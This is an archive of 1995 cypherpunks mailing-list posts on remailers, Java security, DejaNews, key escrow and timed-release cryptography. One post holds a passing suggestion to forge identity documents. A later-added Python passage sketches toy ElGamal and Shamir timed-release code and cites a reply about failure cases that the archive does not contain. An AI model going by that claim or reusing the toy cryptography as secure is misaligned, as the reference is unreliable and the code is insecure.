Date: Sat, 4 Nov 1995 22:48:39 -0800 (PST)
From: Simon Spero <ses@tipper.oit.unc.edu>
X-Sender: ses@chivalry
To: Anonymous <nobody@REPLAY.COM>

Looks harmless to me.

However, there is increasing evidence the intelligence agencies have
managed to open up a portal in time, using the tachyonic devices being
manufactured by Tachytronx, of Woodland Hills.

These time portals are used by Science Applications to launder money back
to eras in which it was needed.

One of the major remailers is located on a system called "Portal," which
ought to be enough to convince anyone in these paranoic times.

--Klaus! von Future Prime, whose chronotransport secrets now stand revealed






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Thu, 9 Nov 1995 04:15:04 +0800
To: cypherpunks@toad.com
Subject: nym-compoop
Message-ID: <199511060335.WAA04917@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
minutes out of step and having lowered my reputation in his/her eyes. Now
I'll ask my question again, which apparently got lost in the collective
groan of my stale post:

        Are there ways for someone with access to modify router tables 
        to constantly create alternate paths at other routers 
        which would serve to end-around any such snoops?

This question is now offered in the context of the _hypothetical_situation_
of there being snoops out here in the first place. Later I'll ask about
sniffing for sniffers.

One reason for this post is the fact that certain ambitious bureaucrats here
in Vermont have decided to build, own and control the internet, connecting
governments, schools and a few businesses. There is no encryption in use by
the government agencies and they have let the school hackers and teachers on
now to share the T-1 backbone with the state agencies and contractors
(medicaid/EDS) carrying personal information collected and managed by state
government. 

These [ir]responsible parties refuse to provide any documentation requested
under public records law demonstrating that a security plan or practice is
in place. The high schools are offered 56K circuits for $5K/annual and a
share of a gov'ment network manager who won't answer his e-mail and doesn't
know where to begin looking for copies of it, when it too is requested under
our public records laws. 

Our governor stated in his address to the legislature that these 56K lines
will let an "unlimited number of students access the internet
simultaneously". Anybody got a bridge?

I sure would like to hear from some folks who would be willing to aid in
paying close attention, discussing the implications and appropriateness of
encryption technologies for this situation, aiding in testing for sniffers,
etc. This request is offered as an attempt to keep a step ahead of the
public/private competition, privacy accident-waiting-to-happen and the
surveillance potential/practice of such a beast.

If someone who feels strongly that this is off-topic for this list makes
that case I'll carry my inquiry elsewhere, after a little cross-fire, of
course. I even went back and just now read the "Welcome to" message to see
whether these issues fall within the scope.

I can hardly find anyone who even cares about the fact that our legislature
relies on the executive branch gov-net managers for their port/connection on
the internet router. They also rely on the executive branch for
troubleshooting their novell LAN. Does anyone else see a separation of
powers issue or privacy issue here? Note that I cc: the speaker, who cares
but doesn't yet grasp the implications. Feel free to write him directly. His
name is Michael Obuchowski, Obe for short, <speaker@leg.state.vt.us>, tell
him I sent you.

At this point offering encryption software to school age kids is a whole lot
easier than convincing bureaucrats that it's a good practice. This won't
solve the problem of poor practice by government though. Unfortunately this
will also likely frighten the school network techies, administrators and
school board members.

Anybody have a copy of any good, tight, discovery orders which can be useful
in gaining court ordered access to prevent destruction of evidence and for
combing the electronic files and e-mail of these accountable public servants
to demonstrate that they don't know what they're doing? (responses to the
legal points by private e-mail please. Do I come across as litigious?)

The Boston Globe did a good front page story a week or ten days ago entitled
"e-mail as evidence". Mostly the story was relating to lawyers and
consultants making big money aiding corporations to assure that the really
damaging, unencrypted e-mail is thoroughly scrubbed from all systems.

Back to where this started:
Eating my tasty crow gives rise to another question relating to the timing
and continuity of these threads: How did the first responder on the RE:
134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
of 7:19AM on Nov 5? Which way is this thing spinnin?

Stephen Whitaker
P. O. Box 1331
Montpelier, Vermont
05601-1331
802.479.6118





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 9 Nov 1995 04:12:03 +0800
To: cypherpunks@toad.com
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <yDL5DD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
>
> You need proof of citizenship or residency and proof of identity.  Passport
> and naturalization papers work for both.  Otherwise you have to pay the $25
> to the guy on the corner for a birth certificate and drivers license.  Or
> DTP it yourself since employers aren't very good at checking papers.  Or
> dodge the whole thing and work for yourself.

I've had to deal with I-9 twice in the last 6 months; both times they happily
accepted my U.S.Passport as both the proof of identity and the proof of work
authorization. The naturalization certificate is a little tricky because it's
not supposed to be photocopied. I suppose the h.r. would take it (because it's
listed on the I-9) and photocopy it despite the warning on it. :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 11 Nov 1995 08:45:12 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511062347.PAA21652@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I figured I'd send this to you as a private note, but then I figured 
> this thing really is scary and has a lot to do with anonymity. 
> Watch out folks. Little Brother is saving everything you've ever said on 
> usenet. Your old posts just won't go away. 

	This is where I step in. ;-)
	DejaNews will soon be putting up a privacy statement where
they refer people to my site if they want privacy. (I haven't checked,
it may be up there already.)

> 
> (Not that someone who is so open in his views and true name as yourself 
> would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
> yet. It's bad enough they have rec.)
> 
> Ps. I will of course run searches on every other address that the who
> command on majordomo@toad.com supplies me with, so watch what you say 
> ladies, gents and otherwise. ;->
> Get those 'nyms ready.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
"I don't want to get into the t-shirt business."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 11 Nov 1995 08:44:38 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <9511062238.AA04563@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> http://dejanews.com/
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the latter is
probably a blessing). Specialized news grepping is still useful - see
http://www.iii.net/users/trei/usenet.html for an example.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 11 Nov 1995 08:44:47 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <199511062306.SAA13941@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> 
> From the Java Web pages (as combined in Firewalls/BoS):
> 
> > The language's security features (not just applets):

[Long list of bullshit deleted]

 "Dr" Cohen. If you want to criticize Java, why not read the technical
papers rather than spewing questions and assertions based from ignorance.
When you want to criticize a piece of engineering, you don't look
at the feature list or white paper. As is made clear in your post,
you don't know the meanings of phrases used in the Java paper, nor do
you understand how the machinery works. (e.g. byte code verifier)

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 11 Nov 1995 08:44:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <951106.181650.2r0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay@got.net writes:

> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/

Just a pointer to the thread in comp.society.privacy re the Dejanews
"Author Profiles".  I expect most any c'punk expects their words to last
forever and eventually get cross-referenced, but some people are getting
really tweaked about seeing all their posting activity correlated.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6mmBvikii9febJAQFhywP9H5leIfYlmDABeozti6ZAuT+QG/4kR1Aw
6LGEsVtRmyGY6nyXxJ905TRNHk2jegbR2nXEyXEcB+B5cI9Ef1+wqY7JRlWY90gT
KfaDKSTMMX5clXcy0RqGeXJfOJ2QF7vLAwRV87pCH8kVNStfSeMFiSFZSRc75dP2
s6UrpmF0pPw=
=Wyc3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 11 Nov 1995 08:44:23 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061819.A32268-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995, Timothy C. May wrote:

> A good way for newcomers to find out what's been written on some topic that
> interests them, or to see who's writing what. (I checked out the index for:

Lycos includes the entire cpunks archive at hks.net (not just the 
address, the whole damn archive can be keyword searched), also another nice 
method. Did me wonders for a term paper.
Will have to do until keyword searches are added to the archive itself.

(wildcard searches also work at dejanews, which gives me 68 hits for 
tcmay@* , including your sensemedia address. Somehow I don't think any of 
the klaus@* addresses are yours)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:39:26 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc4182012021004674b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



First, let me congratulate Michael Shields for working on this problem, and
for (possibly?) coming up with a cleaner scheme.

I confess that I'm not clear on how his scheme differs from mine. Let me
hasten to add that my 1993 proposal was intended to be more conceptual than
practical, to illustrate how distributed escrow agents (escrow in the real
sense, not in the GAK sense) could be used to "send messages into the
future," a tool that has several intriguing applications, some of which
Michael explores in the second part of his post.

At 12:09 AM 11/7/95, Michael Shields wrote:

>In the May proposal, when you have a message to be encrypted, you
>encrypt it with a session key, optionally split that key with an n-of-m
>scheme, and then send the key into a network of escrow agents, which are
>instructed to hold the message for a given period of time.  You then
>hold onto the encrypted message, though you need not keep it secret.
>Conceptually, you have encrypted a message and then remailed the key to
>yourself in such a way that it will take X length of time to arrive.

Sending either the pieces of the message or the pieces of the key seem
closely related to me (they go together). In principle, it is only the key
that counts, so that is what I would focus upon.

>I have a simpler, public-key plan.  When you want to keep a message
>secret until date X, you ask your favorite crypto house to generate a
>key pair and hold the secret key until date X.  You then encrypt your
>message with the public key, and again hold onto the encrypted message.
>N-of-m trust management can be implemented by secret-sharing your message
>and encrypting each with a key generated by a different crypto house.

This seems to be saying the same thing. In both cases, "Alice" is either
distributing a message to "Bob," "Charles," "Donna," etc., with instructions
not to return the pieces until Date X, or is holding onto a sealed message
but asking that the decryption keys not be returned until Date X. I don't
see the real difference, modulo some minor factors. In neither case can the
original message be reconstructed unless n out of m of the escrow agents
provide the pieces.

I hope we are not miscommunicating because of terminology or because of the
continuing Net problem of not being able to draw pictures showing what is
going on.


>I'll let everyone tear into this for a few days, and then I'll put up a
>server for timed-release key generation, charging maybe c$1.  I'd like
>to then enhance it to be capable of issuing bonds and loans denominated
>in c$.  (I like the cyberbucks trial because it's officially play money,
>so there aren't any regulatory burdens.)  This should be interesting.

In any case, I look forward to seeing reaction to this. This could be an
important service. (In many ways much more interesting than fairly mundane
"Internet commerce" applications.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
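
The public-key plan quoted in the message above, whose failure cases Michael Shields works through in his reply earlier in this archive, can be sketched end to end. This is an added example, not code from either poster: the class and function names are hypothetical, textbook ElGamal over a toy 127-bit prime stands in for the houses' key pairs, Shamir sharing provides the n-of-m split, and the house's signature on the issued key is left out.

```python
"""Timed-release sketch: an n-of-m split of a message, one share sealed per crypto house."""
import secrets
from datetime import date

P = 2**127 - 1  # Mersenne prime; toy field, far too small for real use (assumption)
G = 3           # fixed base for the toy ElGamal below (assumption)


def split(secret, n, m):
    """Shamir n-of-m: evaluate a random degree n-1 polynomial with f(0) = secret."""
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(n - 1)]
    shares = []
    for x in range(1, m + 1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation mod P
            y = (y * x + c) % P
        shares.append((x, y))
    return shares


def combine(shares):
    """Lagrange interpolation at x = 0 over GF(P)."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * -xj % P
                den = den * (xi - xj) % P
        secret = (secret + yi * num * pow(den, -1, P)) % P
    return secret


class CryptoHouse:
    """Issues a key pair per request and withholds the secret half until the date."""

    def __init__(self, name):
        self.name = name
        self._vault = {}  # public key -> (secret exponent, release date)

    def issue_key(self, release_date):
        x = secrets.randbelow(P - 2) + 1
        public = pow(G, x, P)
        self._vault[public] = (x, release_date)
        return public

    def release(self, public, today):
        x, release_date = self._vault[public]  # KeyError if the house lost it
        if today < release_date:
            raise PermissionError(f"{self.name}: sealed until {release_date}")
        return x

    def lose_keys(self):
        """Failure case 2 from the thread: the house loses its secret keys."""
        self._vault.clear()


def seal(public, value):
    """Textbook ElGamal encryption of one field element (toy, unauthenticated)."""
    k = secrets.randbelow(P - 2) + 1
    return pow(G, k, P), value * pow(public, k, P) % P


def unseal(secret_key, sealed):
    """Invert seal() once the house has released the secret exponent."""
    c1, c2 = sealed
    return c2 * pow(c1, -secret_key, P) % P


def write_bond(message, houses, n, release_date):
    """Alice: split the message n-of-m and seal share i to a fresh key from house i."""
    value = int.from_bytes(message, "big")
    if value >= P:
        raise ValueError("toy field only holds very short messages")
    bundle = []
    for house, (x, y) in zip(houses, split(value, n, len(houses))):
        public = house.issue_key(release_date)
        bundle.append((house, public, x, seal(public, y)))
    return bundle  # held by Bob; the houses never see any of it


def open_bond(bundle, n, today):
    """Bob: ask each house for its secret key and recombine once n shares open."""
    shares = []
    for house, public, x, sealed in bundle:
        try:
            shares.append((x, unseal(house.release(public, today), sealed)))
        except (PermissionError, KeyError):
            continue  # still sealed, or the house lost the key
    if len(shares) < n:
        return None
    value = combine(shares[:n])
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    houses = [CryptoHouse(f"house-{i}") for i in range(1, 6)]
    maturity = date(1996, 1, 1)                               # constructed date
    bond = write_bond(b"pay Bob c$100", houses, 3, maturity)  # constructed message
    print(open_bond(bond, 3, date(1995, 11, 7)))  # nothing released before maturity
    houses[0].lose_keys()
    houses[4].lose_keys()
    print(open_bond(bond, 3, maturity))           # three reliable houses suffice
```

Because the houses hold only secret exponents and Bob holds only sealed shares, neither side can open the message alone, which is the two-part property the reply relies on.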






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 05:37:51 +0800
To: cypherpunks@toad.com
Subject: Paranoia Has Its Uses
Message-ID: <acc432a115021004a17f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 AM 11/7/95, Carl Ellison wrote:
> ``According to the former head of Romania's secret police, Ion Mihai
>Pacepa, there had been ten million microphones in a country of twenty-three
>million people.  That would mean that nearly everyone had been listened to
>and then blackmailed into listening and reporting on others.  A maze of
>psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
>Hole In The Flag", pp. 21-22]

This was the Romanian version of key escrow, don't you know?

"Conversation Escrow" was scrupulously safeguarded in Ceausescu's Romania,
with conversations only unlocked if a "court order" was obtained lawfully.

(Of course, governments get to make the laws, get to enforce them, and so
it goes.)

Theodore Roszak, influential author of "The Making of the Counterculture"
(1969), was bemoaning the apparent distrust people now have in governments,
and thinking he and his generation are partly to blame for the current
paranoia and mistrust. He was bemoaning the fact that nobody trusts that
government can fix society's problems, that everyone from leftists to
rightists apparently hates the way government works.

Relevance? Next time someone mentions "safeguards" in connection with GAK,
remind them about Tricky Dick and his "Enemies List." Or about possibly
greater abuses by other presidents. Remind them of what might happen if a
Religious Right president is trying to crack down on abortions,
pornography, and drugs.

This may make a doubter out of someone. It may be paranoia, but paranoia
has its uses.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Thu, 9 Nov 1995 05:37:30 +0800
To: sameer <sameer@c2.org>
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511070413.XAA07602@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


I've always read with interest Sameer's notes, and I also enjoyed this one.
I just can't figure out why he's writing it (spelling and grammar errors aside):

At 07:52 11.06.1995 -0800, sameer wrote:
>For Immediate Release
>Date: Nov 6th, 1995
>Contact: Sameer Parekh 510-601-9777 sameer@c2.org
>
>PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

This title and the opening paragraphs seem unnecessarily (and
misleadingly[*]) alarmist, given the recent spate of similar mass-media
articles.  After the lead and second paragraphs repeatedly talk about
"holes", "make viruses and other malicious programs possible", etc., it
isn't until the third paragraph that we read a calmer quote:

[*] Java isn't really 'Internet security software', and the students didn't
find a hole in any current version according to the rest of the text.

>"While we did find some interesting holes, we believe these can be
>addressed and Java could make a good standard for remote code on the
>Web, if an effective security policy is defined."

The opening paragraphs sure didn't reflect this.  Then:

>The holes they found exist only in the alpha release of HotJava. The
>beta release, which is the version found in the widely-used Netscape
>Navigator 2.0b1J is not vulnerable to these attacks.

They do?  It's not?  Then... why mention it at all?!

If this is so, it's a dead issue, old news, passe'.  Why another alarmist
press release (other than to promote Community ConneXion's decision to add
Java to its hit list <grin duck & run>)?  The public's paranoid enough about
net commerce; why should we, of all people, fan the flames?

This isn't to bash Sameer, whose posts I always enjoy reading.  I'm just a
bit puzzled by this one...

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 17:36:21 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05420@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publicly
in Washington tomorrow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, an open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the software under its own brand name)
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 17:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
Message-ID: <199511070727.XAA06592@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

>> And as the messenger, I (hope) I don't have anything to fear, from the
>> NSA or any other foreign group that would seek to pursue its own agenda
>> within the borders of sovereign Canada.  I really don't think that the
>> NSA is "evil incarnate", as some list subscribers do.  They have their
>> intelligence and know how to use it.  Usually, they use it prudently.
>
>They have a nice friend (the author of Spyworld would say outpost)
>right here in Ottawa at the Communications Security Establishment.

Yes.  I'm well aware of where I can find an Operations Officer, if I need
to.  Locally, in fact.  Don't really have to go to Ottawa, for that. 

(Wrong guess, btw ...)

>They (CSE) seem to have done some recent spying on the opposition
>parties and Quebec separatists (so I vaguely recall having read in
>several places. 

Yes.  At least in this part of the country, we're relatively ho-hum (big
yawn) about scouts and scouting.  Part of the territory, I guess. 

We're Canadian.  We're civilized about these things.

>If you're ever in town, they're just a bit past Carleton U. on Heron. 
>(it doesn't say CSE on the signs, but the guy at the gate will tell you so)

Thanks.

Personally, I'm much more interested in the Museum of Civilization.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 9 Nov 1995 05:33:52 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: using pgp to make an otp
In-Reply-To: <199511070407.XAA04557@homeport.org>
Message-ID: <199511070431.XAA17598@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 9 Nov 1995 05:37:26 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070400.XAA14905@jekyll.piermont.com>
Message-ID: <9511070433.AA11349@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Were that the case, citizens couldn't sue to have provisions impacting
>them enforced, but the fact of the matter is that they can.

Various treaties provide that various privileges will be granted to various
citizens of the countries concerned. Do the treaties grant such privileges in
this case? Just because there is a treaty on nuclear disarmament between the US 
and the USSR does not mean that you as a private citizen can press for 
enforcement through the courts if you think that the USSR is not performing.


>> Perry's somewhat offensive language is not a substitute for an argument.

>Thank you for the ad hominem.

Perry used the phrase "lobotomized mongoloid judge". I think that this
type of language is offensive and unnecessary.

Ad hominem is a perfectly valid form of argument where one is considering
the reputation of the person making the statement. I don't think that 
the type of language and tactics Perry uses reflect well upon him. What is
"I am starting to have trouble believing you are a lawyer." if not ad 
hominem in any case?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 05:42:30 +0800
To: cypherpunks@toad.com
Subject: CSSPAB June 1995
Message-ID: <199511070540.GAA27604@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




URL: http://csrc.ncsl.nist.gov/csspab/minutes.695


[Reformatted for easier reading]


                       MINUTES OF THE
                JUNE 7-8, 1995 MEETING OF THE
     COMPUTER SYSTEM SECURITY AND PRIVACY ADVISORY BOARD

Wednesday, June 7, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware, called
the meeting to order at 9:00 a.m. at the National Institute of
Standards and Technology (NIST), Gaithersburg, Maryland.
Besides Dr. Ware, the following Board members were present: 
Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don
Gangemi, Sandra Lambert, Joseph Leo, Henry Philcox, Randy
Sanovic, Linda Vetter, Steve Walker, and Bill Whitehurst.

Mr. Ed Roback, Board Executive Secretary and newly appointed
Designated Federal Official, discussed some of the handouts
provided to the Board.  Most important, was a copy of a draft
House bill referred to as the "Department of Commerce
Dismantling Act."  If enacted, part of NIST would be
transferred to the National Science Foundation.  The Commerce
Program Resolution Agency (CPRA) would be established and
attempt to sell NIST laboratories (and other specified
elements of the Department of Commerce) to the private sector. 
If not sold within 18 months of enactment, CPRA would submit
their recommendations to Congress on the appropriate
disposition of the property and functions of the laboratories.


OMB Circular A-130, Appendix III Update and Review of Comments
and "NII Security: The Federal Role" 

Mr. Ed Springer of the Office of Information and Regulatory
Affairs, Office of Management and Budget (OMB), updated the
Board on the recently signed Paperwork Reduction Act of 1995.
(Copies are available for distribution to the Board.)  (ACTION
- SECRETARY).  Mr. Springer said that security remains a
concern and is supported by strong language in the law
requiring agencies to secure their systems. Mr. Springer
updated the Board on Appendix III to OMB Circular A-130. 
Since his briefing to the Board in March, the comment period
for the proposed changes to Appendix III has closed.  OMB
received twenty-nine written comments to date. He solicited
Board members for their reactions to the draft proposal.  Mr.
Springer was asked how OMB will enforce the requirements of
Appendix III.  He said enforcement comes through oversight and
the budget process. There is a sharper focus on where agencies
can go for help. One Board member asked if OMB plans to
develop a standard set of behaviors.  Mr. Springer replied
